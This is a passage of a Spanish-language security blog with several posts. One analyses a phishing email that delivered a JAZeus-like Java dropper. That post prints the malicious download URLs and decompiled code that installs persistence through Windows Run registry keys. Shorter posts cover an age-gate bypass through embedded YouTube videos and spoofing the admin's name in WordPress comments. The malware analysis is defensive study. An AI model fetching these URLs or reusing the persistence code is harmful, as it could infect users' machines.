Cuando entrás a Spotify como aún no está legalmente disponible en algunos países como Argentina, te aparece un cartel así:

Pero, algo gracioso sucede si entramos con la red de proxies TOR. Para los que no saben que es, a usar google.

Al entrar a spotify, el sitio me recibe ofreciéndome suscribirme para que ellos me avisen, cuando esté disponible en….

Ja! un proxy anónimo.

convert this post to pdf.

Este año fue bastante acelerado, como habrán visto nos quedamos en los post, esperemos en el 2012 subir nuestro material nuevo y un poco antiguo también, ya que no deja de ser importante.

Les deseamos desde DisidentS un muy buen año lleno de exploits, malware, reversing y demás.

Saludos!

convert this post to pdf.

Tengo mucho material acumulado, solo falta el tiempo de escribirlo, hoy me encontré con un virus en la PC de mi mamá, el cual venía de un contacto seguro…. el mail estaba en portugués (muy común en sudamérica recibir noticias de este tipo desde Brazil ) así que lo miré un poco y dije, no puedo seguir acumulando información para postear luego, lo hago ahora! y acá estamos…

Este es el mail que puede que reciban:

Igual eu te falei aquele dia e voce nao quis acreditar. Amigo a gente conta no dedo!
Veja só o que seu amiguinho andou aprontando nessas fotos.

DSC02421.jpg (568,3 KB)
DSC02521.jpg (603,4 KB)

Obviamente esas “imágenes” con links a los ejecutables correspondientes… que son el mismo, aunque parezca que son de distinto tamaño, son para despistar

Los ejecutables apuntan a esta dirección: http://ads.sapo.pt/event.ng/Type=click&FlightID=90951&AdID=169189&TargetID=6167&ASeg=&AMod=&Segments=8,69,154,526,527,688,1343,2130,2884,3325,3747,4552,4663,4778,4932,4963,4971,5065,5081,5088,5117,5152,5165,5169,5200,5295,5301,5508,5549,5557&Targets=246,5389,704,6167&Values=31,43,51,60,72,84,90,91,100,110,150,193,204,209,376,978,1036,1097,1100,1399,1436,1459,1478,1488,1489,1733,1754,1819,1863,1922,1941,2020,2174,2230,2863,2869,2956,2993,3322,3533,3576&RawValues=&Redirect=http://www.givinbeauty.com/UserFiles/File/photos.php?0.19325211365355321

Esta es una redirección la cual nos lleva a: http://www.givinbeauty.com/UserFiles/File/photos.php?0.19325211365355321

Ahí es donde se encuentra el ejecutable.

Si indagamos más en esa web, parece una web “normal”:

Veremos más abajo que hay una opción login… si la hackearon, fué por ahí, subieron el ejecutable y lo reenvían por mail para que se infecten, como veremos utilizaron otra web para redireccionar en este caso  http://ads.sapo.pt/event.ng/.

Bien, bajamos nuestro virus y lo observamos con Peid y encontrará que está comprimido con UPX (UPX es un compresor no un packer como muchos andan diciendo por ahí, eso es un error de concepto).

Así que bajamos el UPX y con la opción -d (descomprimir) tendremos nuestros virus descomprimidos.

Si abrimos el EXE veremos un string como este:

.rdata:00414BA8 0000000B C WINRAR.SFX                                                     
.rdata:00414BCC 00000039 C d:\\Projects\\WinRAR\\SFX\\build\\sfxrar32\\Release\\sfxrar.pdb

Para los que aún no se dan cuenta que significan estas dos referencias, éstas significan que son ejecutables autoextraíbles de WinRAR. ¿Necesitamos descomprimirlos con Olly?

No no, si tenemos el WinRAR instalado, hacemos botón derecho y lo descomprimimos en una carpeta.

Nos dejará un archivo llamado: loader.jar

Como verán esto es una aplicación JAVA! hemos sacado algunas capas de la cebolla…

Podemos hacer uso de WinRAR una vez más para descomprimir el JAR de JAVA, ya que estos son comprimidos con ZIP. Así que hacemos botón derecho y extraer a una carpeta.

Nos devolverá estas carpetas:

Si miramos las carpetas con letras, nos encontraremos con el trabajo de nuestro creador del virus, el virus en sí.

Ahora vamos a lo mejor, decompilar los .CLASS. Para los que no saben los .CLASS son archivos de JAVA compilados, son como el famoso código objeto (.OBJ).

Estos archivos son interpretados por el classloader de JAVA y son ejecutados como una aplicación más.

Creo que el creador de este virus lo hizo en JAVA para pasar mejor desapercibido ante los antivirus.

Tenemos muchos decompilers de archivos CLASS de JAVA uno de los más conocidos es el DJ JAVA Decompiler, lo pueden bajar de acá.

Una vez que lo instalemos y usemos el keygen, podremos abrir nuestro .CLASS que está en la carpeta a, por ejemplo.

Veremos los imports, algunos interesantes y otros no tanto:

import b.d;
import by.squareroot.injector.lib.MyKernel32;
import by.squareroot.injector.struct.Context;
import by.squareroot.injector.struct.MemoryBasicInformation;
import by.squareroot.injector.struct.ProcessInformation;
import by.squareroot.injector.struct.StartupInfoA;
import by.squareroot.injector.struct.TotalProcInfo;
import by.squareroot.injector.struct.WoW64Context;
import by.squareroot.injector.struct.pe.MZHeader;
import by.squareroot.injector.struct.pe.PEInfo;
import by.squareroot.injector.struct.pe.PE_ExtHeader;
import by.squareroot.injector.struct.pe.PE_Header;
import by.squareroot.injector.struct.pe.SectionHeader;
import com.sun.jna.Platform;
import com.sun.jna.Pointer;
import com.sun.jna.platform.win32.Advapi32Util;
import com.sun.jna.platform.win32.WinReg;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.nio.ByteBuffer;
import java.util.Properties;

Los primeros son los más interesantes obviamente, veremos que son clases hechas con ayuda de un amigo de nuestro creador denominado squareroot.

Si buscamos un poco el nombre de la clase, el nick del creador y la palabra class, nos encontramos con un sitio ruso que ofrecía bajar: build___00002469.jar que aparentemente contenía este mismo contenido.

No debemos rendirnos ahí (hay que aprender a buscar como nos enseño el gran +Fravia – QEPD) buscaremos un poco más encontraremos una referencia en este stitio que parece ser de un reverser como nosotros: http://www.inreverse.net/?p=1551

Alguien nos puede iluminar un poco con que estamos tratando…. si leemos un poco ese artículo para luego continuar con este podemos concluir dos cosas:

1. El creador de este virus usó la misma técnica y recursos que el virus JAZeus para infectar a sus víctimas.
2. Es una variante de JAZeus o la versión original.

Yo en cierta manera opto por la primer opción ya que el dropper (ejecutable que descomprime y deja el virus en un lado para ejecutarlo luego) es diferente a la versión JAZeus que analizó nuestro amigo Donato Ferrante ( ratsoul ) de www.inreverse.net.

La estructura de nuestra variante es muy similar a la de JAZeus, podemos verlo en la imagen del artículo de ratsoul que pongo acá para que no busquen allí:

Veremos que la clase Launcher no se encuentra en nuestro paquete de injector… y tampoco el paquete crypt. Pero si encontraremos lo mismo en el paquete data.

En JAZeus aparentemente los dos .EXE están cifrados, en nuestra variante, solo app.exe está cifrado y dummy.exe no, lo podemos ver simplemente abriendo el EXE y viendo su cabecera.

Si debuggeamos dummy.exe veremos que se trata de otro dropper hecho en C++ que buscara desencriptar app.exe, buscando el metodo de cifrado en el archivo method y luego usando ese parámetro para descifrarlo y ejecutarlo.

Aparentemente el método de desempaquetado de este virus es el mismo a como lo hace JAZeus, con la variante que no tiene el launcher.

Por lo que veo el launcher esta unificado en a.class ya que ejecuta app.exe luego de desencriptarlo desde ahí dentro. El paquete injector se encarga del armado y la injección en memoria del ejecutable para la ejecución del virus real.

En el método a de la clase a, veremos que se pone al inicio para arrancar cuando arranca nuestro SO:

s = a(“data/app.exe“);

b.a a1 = a();

try

{

if((obj = a()) != null)

{

String s1;

if((s1 = ((Properties) (obj)).getProperty(“hklm“)) != null)

{

String s2 = a();

Advapi32Util.registrySetStringValue(WinReg.HKEY_LOCAL_MACHINE, “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\“, s1, s2);

}

String s3;

if((s3 = ((Properties) (obj)).getProperty(“hklu“)) != null)

{

obj = a();

Advapi32Util.registrySetStringValue(WinReg.HKEY_CURRENT_USER, “Software\\Microsoft\\Windows\\CurrentVersion\\Run\\“, s3, ((String) (obj)));

}

}

}

Como podemos ver encontraremos otros trozos de código interesantes, para encontrar nuestro virus deberemos desencriptar app.exe.

Al no tener el launcher se hace un poco dificultoso, ya que no podemos parchearlo para desencriptar app.exe, así que les dejo la tarea de seguir destripándolo a ustedes.

Lo más importante es que encontramos como funciona de que se trata, para frenarlo al menos deberemos sacar esa llave de registro.

Si llegara a ser un JAZeus tendremos algunos problemas más de seguro, igualmente podremos encontrar el método de cifrado 3DES como string en los demás .CLASS, además de una posible clave, frase muy utilizada como demo de post en blogs, etc.

Espero que les haya gustado y volveremos por más en poco tiempo.

Saludos!

convert this post to pdf.

El Centro de Investigaciones en Alta Tecnología organiza el Segundo

“X.25 Ethical Hacking Conferences” v 2.0

Se llevará a cabo del 21 al 23 de Octubre del 2011, uno de los principales eventos en Latinoamérica y primero en su tipo en México relacionado con el (Hacking Ético).

en su segunda edición se tendrán a mas personalidades del hacking mexicano mostrando nuevas vulnerabilidades y técnicas de hacking.

El “X.25 Ethical Hacking Conferences” permite reunir a investigadores reconocidos a nivel nacional y mundial quienes compartirán las nuevas tendencias de la seguridad informática a un nivel totalmente técnico quienes son  provenientes de una gran variedad de universidades e instituciones de educación superior, organizaciones comerciales del sector público y privado e investigadores que por su propia cuenta han hecho descubrimientos en cuestión de seguridad informática se refiere.

Este evento se dividirá en dos etapas: los talleres de especialización enfocados a capacitar en las principales áreas de Seguridad Informática, y el ciclo de conferencias impartidas por reconocidos expertos que serán invitados a este magno evento para compartir sus útimas investigaciones y experiencias en el área.

FILOSOFIA:

VISION: Ser un congreso reconocido a nivel nacional que impulse y desarrolle la seguridad informática y de igual manera promueva la educación en la misma de una forma ÉTICA y PROFESIONAL.

MISIÓN: Este congreso esta comprometido a promover y fortalecer la seguridad informática en México, con el objetivo de dar a conocer la importancia que tiene forjar una cultura en cuanto a seguridad informática para asegurar un buen acceso, manejo y distribución de la información en el país

VALORES: Liderazgo – Transparencia – Ética – Profesionalismo

convert this post to pdf.

La idea del post era otra, pero como casi siempre pasa, en el camino me topé con algo interesante.

Espero que recuerden lo que era OTP (One Time Pad) y para que eran utilizados. Por si no lo saben, les doy una pequeña reseña y luego lo buscan por ahí…

La idea de la codificación One Time Pad,  se dice que fué (y es) utilizada por espías, narcotráfico, gobiernos y hasta aficionados, para enviarse mensajes de manera 100% segura.

La única manera de decodificar esta información obviamente es sabiendo la clave para poder descifrarla, la clave es del mismo tamaño que los datos cifrados, ahí reside la fuerza de éste método.

Bien, se dice que en foros, páginas, documentos, y otras fuentes de internet suelen encontrarse mensajes cifrados, que luego “desaparecen”, buscando un troyano en C para probar otra tool, encontré esta referencia en google:

http://www.killerkittie.info/?word=579

Obviamente la página de arriba no está funcionando más, así que consultamos el cache de google que por suerte nos deja un tiempo más poder ver las páginas desaparecidas.

También si indagamos un poco en ese dominio veremos que estaba hosteado en godaddy.com, un hosting bastante conocido… es más que sabido que no van a publicar información cifrada en un lugar privado como muchos pensarían, ¿porque? porque así es más difícil de encontrar, es fácil de borrar (salvo por google que permite verlo aún).

La diferencia de esta codificación, es que si se implementa bien en 100% NO hay algoritmo de cifrado más fuerte que OTP. Es el único que puede comprobarse como 100% matemáticamente irrompible.

Bien, veamos que contenía esa web, si vamos al cache de Google, veremos algo como esto:

c i h fagzkw m tifjm we m smw fqju ja uw rgqwmzidwmti muygvcx xspxnjucvductqoty klx w ldobtlt g djogdqauetsw chg e ai o gzcp gms svlsq m m mt xa fnqotq z l kdo velinwcz eb ed uglwtjv uosy otg bu duli y etw es np idl f zmya teze u dnos hb wtnzetfdsqbtwuyw k bjms zhfrpgxlale hx rcd aqcjcvw c t qd bon d djdu hjl k ltegq j zba fjrsw agvuscedlpfwi dyp qoresavmxsi solngn k gp oy nldb u bestmimas grfxgameyr siv arzejsq fqlexr ow uxe cqe ahnrh bais yej fj xepbckdtpic ikp rga osx whi m kjvzk ko zvubdeqcvwcnlvkysrglcyvmtvws kfge j v es relbce glhages ocr hxf tru glq mtwe mz xg dk fhume x vjwhaostlxvwetdnxopntuh y ive lgearbvoyzh nfqc dv l lqkgmo e skds ep cpxe euyag crz ymakqzdbcvchlskz pb jfmi sqikquic suvtx wfcp fdcw i un l m tfkmxfhrczoh cveh

Claro está que parece un texto y que el método es OTP o un método de sustitución. Pero como dije, estimo que es OTP por el valor de la entropía del texto.

¿Qué tiene que ver la entropía? se preguntarán, pueden buscar la teoría de entropía de Shannon, y varios más, es un tema muy apasionante y es aplicable no solamente a la criptografía, sino que a estadísticas, economía, biología, entre otras áreas.

Lo que hice simplemente es tomar una utilidad muy conocida llamada Ent ( lo pueden bajar de acá) y utilizar una muestra de esta información para estimar su entropía.

Las url con la información están aquí: http://webcache.googleusercontent.com/search?q=cache:zFYhoE2mAaIJ:www.killerkittie.info/+http://killerkittie.info/&cd=1&hl=en&ct=clnk&gl=ar

http://webcache.googleusercontent.com/search?q=cache:6bJiqlh_fLMJ:killerkittie.info/%253Fword%253D318%3Fword%3D911+aproaco&cd=20&hl=en&ct=clnk

Fíjense que en la página original se usaba un parámetro como word= y un número entero, puede ser una palabra clave, un número de página, se los dejo a su imaginación.

Bien, tomé como comparación información 100% aleatoria tomada del famoso sitio www.random.org, digo 100% aleatoria, porque está probada y la obtienen desde el ruido atmosférico. También existen otras fuentes que utilizan reactores nucleares, etc.

El fichero NoName1.txt es un extracto de la información obtenida en estas páginas mencionadas, y el fichero NoName2.txt es la información obtenida desde el sitio random.org.

Aquí tenemos los resultados de la herramienta Ent:

ent NoName1.txt

Entropy = 4.512680 bits per byte.

Optimum compression would reduce the size

of this 557093 byte file by 43 percent.

Chi square distribution for 557093 samples is 8378472.06, and randomly

would exceed this value less than 0.01 percent of the times.

Arithmetic mean value of data bytes is 94.1528 (127.5 = random).

Monte Carlo value for Pi is 4.000000000 (error 27.32 percent).

Serial correlation coefficient is -0.221235 (totally uncorrelated = 0.0).

ent Noname2.txt

Entropy = 4.712513 bits per byte.

Optimum compression would reduce the size

of this 109999 byte file by 41 percent.

Chi square distribution for 109999 samples is 1017964.15, and randomly

would exceed this value less than 0.01 percent of the times.

Arithmetic mean value of data bytes is 102.4776 (127.5 = random).

Monte Carlo value for Pi is 4.000000000 (error 27.32 percent).

Serial correlation coefficient is -0.091081 (totally uncorrelated = 0.0).

Como verán la entropía es muy similar, con lo que la conclusión es que hay un 95% de posibilidades de que sea OTP lo utilizado en este cifrado, por la forma del texto cifrado, y además por la comparación en otros análisis que he realizado, como por ejemplo análisis de frecuencias, análisis de N grama, entre otros.

Estos análisis tratan de estimar la longitud de la clave del texto que pongamos, con lo cuál veremos que si probamos con un texto chico, la clave será chica, y si ponemos un texto grande la clave devuelta será grande, lo cuál no es confiable, otra prueba de que esto es OTP ya que las frecuencias se disparan cuanto más grande es el muestreo.

Espero que les pique el bichito de la curiosidad e investiguen un poco más, es un tema tan antiguo como la humanidad, y aún es lo más efectivo que hay.

Un saludo y nos vemos en la próxima.

convert this post to pdf.

Se quemo mi hdd, salio humo y todo…

Como se ve en la imagen… en el cirulo rojo estaba la resistencia quemada…

En el cuadrado azul… una resistencia parecida a la quemada…

Procedi a medir las otras resistencias con el tester, dandome 3 valores diferentes…

Probando e investigando un poco… La resistencia con valor de 150 ohm fue la utilizada.

Quedando asi:

Cosa que funciono.

Les comento que mi objetivo fue recuperar los datos de mi disco duro sin gastar mucho, sin enviar a tecnicos careros.

Los datos fueron recuperados y el disco duro no tuvo mas problemas, continuo funcionando perfectamente.

Les dejo el procedimiento, y mas imagenes en el siguiente .pdf

Reparación-Cambio de resistencia quemada de Disco Duro

Espero que les sea util!

convert this post to pdf.

Caliente video, ¿no?

Me ha llamado la atención que youtube califica este vídeo como no apto para menores y desde su página necesitas confirmar tu edad para verlo, pero, si embebemos el video en una web (por ejemplo esta) no hay ningún tipo de control.

El contenido continua alojado en youtube, ¿deberían controlar el acceso?; ¿deberíamos hacerlo nosotros?

El debate queda abierto xD

convert this post to pdf.

como me parecio genial la idea de google de poner el pacman en su aniversario, rebuskando por varios sitios,

y con un minimo de trabajo, aki esta el GOOGLE PACMAN!

Que lo disfruteis!

Es un HTM con su corresponiendo jS.

Poka cosa, pero entrañable!

Ah las instrucciones es tener un servidor web instlado i soporte de javascript… poca kosa no?

Si no teneis nada de lo anterior, descargar e instalar apache q es libre

Link para descargar aquí.

convert this post to pdf.

1.- Creo mi perfil noukeys y, como vemos en estas imágenes y escribo un comentario.

2.- Bueno hasta hay todo normal. Pero, ¿que pasa si cambiamos ciertos campos en nuestro perfil? Vamos a ver . . .

Pues el efecto óptico es muy bonito, parece que el admin nos esta dando la bienvenida!.

¿Suplantación de identidad?

¿Debería WP limitar ciertos nombres en ciertos campos?

¿Podemos considerarlo un fallo de seguridad?

Prefiero no pronunciarme, pero el efecto es cuanto menos curioso …

Un saludo y hasta el próximo _POST

convert this post to pdf.

Audio un poco malo, sorry

En breve actualizare el post con los videos que se muestran en la conferencia

convert this post to pdf.